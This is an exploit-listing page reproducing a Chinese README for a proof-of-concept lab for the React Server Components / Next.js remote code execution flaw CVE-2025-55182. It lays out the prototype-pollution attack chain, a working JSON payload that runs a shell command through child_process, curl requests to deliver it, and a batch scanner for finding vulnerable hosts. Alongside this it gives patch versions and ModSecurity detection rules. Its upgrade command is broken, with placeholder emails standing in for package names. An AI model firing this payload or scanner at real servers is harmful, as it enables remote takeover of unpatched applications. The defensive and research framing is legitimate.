Sploitus

Exploit for CVE-2025-55182-POC

kitploit · 2026-08-31

Exploit Code

MARKDOWN282 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HUAHUAI23-CVE-2025-55182-POC
# CVE-2025-55182 / CVE-2025-66478 漏洞复现环境

这是一个用于复现 React2Shell (CVE-2025-55182) 和 Next.js RSC RCE (CVE-2025-66478) 漏洞的最小 MVP。

## ⚠️ 警告

**此项目仅用于安全研究和教育目的。请勿在生产环境或未授权的系统上使用。**

## 漏洞概述

CVE-2025-55182 是 React Server Components 中的一个严重漏洞,影响:

  * **React** : 19.0.0, 19.1.0, 19.1.1, 19.2.0
  * **Next.js** : ≥14.3.0-canary.77, ≥15, ≥16



攻击者可以通过特制的 `multipart/form-data` 请求利用 Flight Protocol 的反序列化漏洞,实现远程代码执行(RCE)。

### 攻击原理

  1. **获取 Chunk 引用** : 使用 `$@N` 语法获取内部 Chunk 对象
  2. **原型链污染** : 通过 `$1:__proto__:then` 注入恶意 then 方法
  3. **触发执行** : Server Action 在 await 时调用被污染的 then 方法
  4. **构造器劫持** : 将 `_formData.get` 劫持为 Function 构造器
  5. **代码执行** : 通过 Blob 反序列化执行任意代码



## 快速开始

### 1\. 安装依赖

root@kitploit:~
    
    
    npm install
    # 或
    yarn install
    # 或
    pnpm install
    

### 2\. 启动开发服务器

root@kitploit:~
    
    
    npm run dev
    

服务器将在 `http://localhost:3000` 启动。

### 3\. 测试漏洞

使用提供的测试脚本:

root@kitploit:~
    
    
    # 单个目标测试
    ./test-exploit.sh http://localhost:3000
    
    # 或直接使用 curl
    curl -X POST http://localhost:3000/ \
      -H "Next-Action: x" \
      -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
      --data-binary @exploit-payload.txt
    

如果漏洞存在,你将在响应中看到类似 `uid=` 的输出(id 命令的执行结果)。

## 文件结构

root@kitploit:~
    
    
    .
    ├── app/
    │   ├── actions.ts              # Server Actions(漏洞触发点)
    │   ├── page.tsx                # 主页面
    │   ├── layout.tsx              # 布局
    │   └── globals.css             # 全局样式
    ├── package.json                # 依赖配置(使用受影响版本)
    ├── next.config.js              # Next.js 配置
    ├── test-exploit.sh             # 单个目标漏洞测试脚本
    ├── scan-targets.sh             # 批量扫描脚本
    ├── exploit-payload.txt         # Exploit payload 文件
    ├── Cve-2025-55182-modsecurity-rules.conf      # ModSecurity 防护规则
    └── README.md                   # 本文件
    

## 测试脚本说明

### 1\. test-exploit.sh - 单个目标测试

测试单个 URL 是否存在漏洞:

root@kitploit:~
    
    
    chmod +x test-exploit.sh
    ./test-exploit.sh http://localhost:3000
    

**特征** :如果响应包含 `uid=` 或 `gid=`,说明漏洞存在。

### 2\. scan-targets.sh - 批量扫描

批量扫描多个目标 URL:

root@kitploit:~
    
    
    # 创建目标列表文件
    cat > targets.txt << EOF
    http://localhost:3000
    https://example.com
    https://api.example.com:8080
    EOF
    
    # 执行批量扫描
    chmod +x scan-targets.sh
    ./scan-targets.sh targets.txt
    

扫描结果会保存到 `vulnerable_hosts.csv`。

## Payload 结构解析

root@kitploit:~
    
    
    {
      "then": "$1:__proto__:then",           // 劫持 then 方法
      "status": "resolved_model",             // 控制执行路径
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",      // 触发 Blob 反序列化
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"  // 劫持为 Function
        }
      }
    }
    

### 关键点:

  1. **$@0** : 引用第一个 form-data 字段,获取 Chunk 对象
  2. **$1:**proto** :then**: 访问 Chunk.prototype.then
  3. **_response._prefix** : 注入的恶意代码(会被 Function 构造器执行)
  4. **$1:constructor:constructor** : Object.constructor.constructor = Function



## 修复方案

### 方案 1: 升级到已修复的版本(推荐)

  * **React** : 19.0.1, 19.1.2, 19.2.1 或更高
  * **Next.js** : 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 或更高



root@kitploit:~
    
    
    npm install some-email@example.com some-email@example.com some-email@example.com
    

### 方案 2: 部署 ModSecurity WAF 规则(临时缓解)

如果无法立即升级,可以部署 ModSecurity 规则临时缓解。

#### Apache + mod_security

root@kitploit:~
    
    
    # 1. 安装 mod_security
    sudo apt-get install libapache2-mod-security2
    
    # 2. 复制规则文件
    sudo cp modsecurity-rules.conf /etc/modsecurity/
    
    # 3. 在 Apache 配置中引入规则
    sudo vim /etc/apache2/mods-enabled/security2.conf
    # 添加: Include /etc/modsecurity/modsecurity-rules.conf
    
    # 4. 重启 Apache
    sudo systemctl restart apache2
    

#### Nginx + ModSecurity

root@kitploit:~
    
    
    # 1. 安装 ModSecurity for Nginx
    sudo apt-get install libnginx-mod-security
    
    # 2. 复制规则文件
    sudo cp modsecurity-rules.conf /etc/nginx/modsec/
    
    # 3. 在 Nginx 配置中启用
    sudo vim /etc/nginx/nginx.conf
    # 在 http 或 server 块中添加:
    # modsecurity on;
    # modsecurity_rules_file /etc/nginx/modsec/modsecurity-rules.conf;
    
    # 4. 重启 Nginx
    sudo systemctl restart nginx
    

#### 规则检测特征

ModSecurity 规则会拦截以下特征:

  * ✅ Flight Protocol 特征(`$@N`, `$BN`)
  * ✅ 原型链污染(`__proto__`, `constructor:constructor`)
  * ✅ 危险的 Node.js 模块调用(`process.mainModule.require`, `require('child_process')`)
  * ✅ 命令执行函数(`execSync`, `exec`)
  * ✅ 内部对象操作(`_response`, `_chunks`, `_formData`, `_prefix`)
  * ✅ Server Action 请求头(`Next-Action`, `RSC-Action-ID`)



**⚠️ 注意** : WAF 规则只是临时缓解措施,不能提供完整保护。升级到修复版本是必要的。

## 安全建议

如果你的应用可能受影响:

  1. **立即检测** : 使用 `test-exploit.sh` 脚本测试你的应用
  2. **立即升级** : 升级到修复版本
  3. **轮转密钥** : 轮转所有环境变量、API 密钥、数据库密码
  4. **审计日志** : 检查访问日志,寻找可疑的 `Next-Action` 请求
  5. **部署 WAF** : 在升级前部署 ModSecurity 规则作为临时防护



## 快速测试 curl 命令

如果你想直接使用 curl 测试(不使用脚本):

root@kitploit:~
    
    
    curl -X POST http://localhost:3000/ \
      -H "Next-Action: x" \
      -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
      -H "X-Nextjs-Request-Id: b5dce965" \
      --data-binary @exploit-payload.txt
    

如果返回结果包含 `uid=` 或 `gid=`,说明漏洞存在。

## 参考资料

  * Vercel 官方公告
  * React GHSA
  * Next.js GHSA
  * CVE PoC (React)
  * CVE Scanner (Next.js)
  * ModSecurity 文档



## 致谢

  * Lachlan Davidson - 发现并负责任地报告了该漏洞
  * Meta Security & React Team
  * Vercel Team



## 许可证

本项目仅用于教育目的。使用本代码时请遵守相关法律法规。